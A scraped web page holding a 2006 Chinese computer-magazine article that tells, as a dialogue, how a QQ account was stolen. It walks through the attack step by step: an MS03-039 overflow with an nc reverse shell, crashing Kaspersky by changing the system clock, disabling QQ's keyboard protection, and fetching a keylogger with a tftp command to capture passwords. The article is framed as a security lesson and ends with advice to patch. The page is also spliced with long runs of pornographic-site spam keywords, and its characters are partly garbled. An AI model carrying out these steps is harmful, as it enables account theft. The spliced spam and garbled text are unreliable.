亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        不凡的黑客幻想 揭開(kāi)QQ號(hào)被盜的謎團(tuán)

        2006-11-02 06:19:22SEAPIGLilyBaby
        計(jì)算機(jī)應(yīng)用文摘 2006年10期
        關(guān)鍵詞:卡巴斯基被盜木馬

        SEAPIG?。蹋椋欤拢幔猓?/p>

        猖狂的盜號(hào)者

        “阿Q,你的QQ被盜了。”我平靜地通知阿Q。

        “你就忽悠我吧,大哥?!?/p>

        “真的,不信你看:本號(hào)被盜,要想找回此號(hào)……”(圖1)

        正在打CS的阿Q,一骨碌就從桌子對(duì)面翻了過(guò)來(lái):“不是吧,我裝的可是卡巴斯基啊?!?/p>

        怎么辦?趕緊到http://service.qq.com/申訴,還好他記性比較好,填了申訴表里的一大堆問(wèn)題,但是要三天之后才有答復(fù)。

        當(dāng)初是我推薦阿Q裝卡巴斯基的,這下QQ號(hào)被盜了,我也挺過(guò)意不去。讓他仔細(xì)回憶一下被盜經(jīng)過(guò),阿Q說(shuō)曾經(jīng)碰到一次QQ突然關(guān)了,以為程序出錯(cuò)所以再次登錄,接著卡巴斯基也崩潰了。

        找找被盜的原因

        由此看來(lái),遭遇盜號(hào)木馬了。可令人不解的是,卡巴斯基怎么崩潰了呢?眾所周知,卡巴斯基的進(jìn)程保護(hù)相當(dāng)強(qiáng)大,除了“冰刃”能“殺”掉其進(jìn)程,無(wú)論是WinXP自帶的NTSD還是大名鼎鼎的PSkill都奈何不了。留下的惟一線索就是系統(tǒng)時(shí)間被改成了2038年,也就是這一改動(dòng)讓卡巴斯基放水了。

        說(shuō)裝了卡巴斯基,病毒木馬入侵的幾率比較小,那么系統(tǒng)漏洞的威脅就比較大了。用X-Scan一掃,MS03026、MS03039、MS03049、MS04011等高危溢出漏洞一大堆,慘不忍睹。

        “你哪年裝的系統(tǒng)啊?那么多重要的補(bǔ)丁都沒(méi)打,想必這就是盜號(hào)者下手的地方了?!?/p>

        “怎么下手?不凡你給我演示下,我要搞清楚,免得下次再中招?!?/p>

        模擬第一現(xiàn)場(chǎng)

        因?yàn)橐呀?jīng)知道了阿Q的電腦上有很多漏洞沒(méi)打補(bǔ)丁,我在自己的電腦上使用MS03039溢出工具,再加上NC反向連接,很輕松就獲取了CMD Shell(圖1)。具體方法請(qǐng)參考《激情溢出三部曲》(本刊今年2月上旬刊),在此不再贅述。

        在獲取C M D S h e l l 后, 用“tasklist”查看進(jìn)程獲知裝有卡巴斯基。面對(duì)虎視眈眈的卡巴斯基,要想上傳盜號(hào)工具難于上青天,關(guān)鍵在于卡巴斯基的相關(guān)進(jìn)程沒(méi)法終止。可最近卡巴斯基爆出了2038漏洞,只要修改一下時(shí)間,卡巴斯基就崩潰了,這就給了盜號(hào)者可乘之機(jī)(以下乃模擬盜號(hào)情景,切勿模仿)。

        我又從硬盤(pán)里找出兩個(gè)工具,《窗口鍵盤(pán)記錄器》和TFTP32,前者用于捕捉鍵盤(pán)記錄,用后者把它送到阿Q的電腦里去。

        將《窗口鍵盤(pán)記錄器》主程序keylog放至TFTP32所在目錄,運(yùn)行TFTP32開(kāi)啟FTP服務(wù)(圖3)。圖標(biāo)還在,給人還在運(yùn)行的假象。

        QQ2005 Beta3之后的版本對(duì)鍵盤(pán)輸入采取了保護(hù)措施,使得鍵盤(pán)記錄程序無(wú)法捕獲輸入字符。將QQ安裝目錄下的npkcrypt.vxd、npkcrypt.sys、npkcusb.sys三個(gè)文件刪除后,鍵盤(pán)保護(hù)就失效了。再刪除LoginUinList.dat,這樣可以清除QQ記錄的號(hào)碼,在登錄時(shí)要重新輸入。

        利用“tftp –i 192.168.1.9 GET keylog.e x e”命令將鍵盤(pán)記錄程序上傳至目標(biāo)主機(jī)并運(yùn)行。用tasklist命令獲取QQ進(jìn)程的P I D,再用“ntsd -c q -p PID”結(jié)束Q Q 進(jìn)程。5分鐘之后,將C : WindowsSystem32目錄下的11111.txt拷貝過(guò)來(lái),里面就有QQ賬號(hào)和密碼(圖6)。

        “這,這就被偷走了???” 阿Q目瞪口呆。

        “對(duì)付不設(shè)防的電腦,那還不是輕而易舉。快回去重裝系統(tǒng)并打補(bǔ)丁吧?!?/p>

        本文中所涉及到的圖表、注解、公式等內(nèi)容請(qǐng)以PDF格式閱讀原文。

        猜你喜歡
        卡巴斯基被盜木馬
        小木馬
        騎木馬
        小木馬
        旋轉(zhuǎn)木馬
        名畫(huà)被盜
        卡巴斯基安全軟件榮膺AV—Test2014年度大獎(jiǎng)
        卡巴斯基企業(yè)級(jí)產(chǎn)品榮膺歐洲SC雜志權(quán)威獎(jiǎng)項(xiàng)
        藝術(shù)品被盜
        卡巴斯基解決方案與Windows 8.1實(shí)現(xiàn)兼容
        2013卡巴斯基三大安全事件
        一区二区在线视频大片| 国产99久久久久久免费看| 亚洲av色福利天堂| 亚洲成AV人片无码不卡| 爱爱免费视频一区二区三区| 五月天激情电影| 东方aⅴ免费观看久久av| 国产三级黄色在线观看| 美女狂喷白浆网站视频在线观看| 高黄暴h日本在线观看| 日本50岁丰满熟妇xxxx | 98国产精品永久在线观看| 在线观看女同一区二区| 女同国产日韩精品在线| 日韩精品视频免费网站| 偷偷色噜狠狠狠狠的777米奇| 日韩手机在线免费视频| 日本精品国产1区2区3区| 亚洲高清在线免费视频| 成人a级视频在线观看| 亚州AV无码乱码精品国产| 精品奇米国产一区二区三区| 高清午夜福利电影在线| 国产精自产拍久久久久久蜜| 三级全黄的视频在线观看| 干出白浆视频在线观看| 91九色老熟女免费资源 | 人妻无码中文人妻有码| 免费福利视频二区三区| 久久精品国产色蜜蜜麻豆国语版| 女人被狂c躁到高潮视频| 亚洲AV无码一区二区二三区我| 国产精品视频白浆免费看| 久久久久99精品成人片| 久久精品久久久久观看99水蜜桃| 欧美成人a视频免费专区| 麻豆精品一区二区三区| 朝鲜女人大白屁股ass| 国产偷2018在线观看午夜| 国产在线观看黄片视频免费| 日韩精品无码一区二区|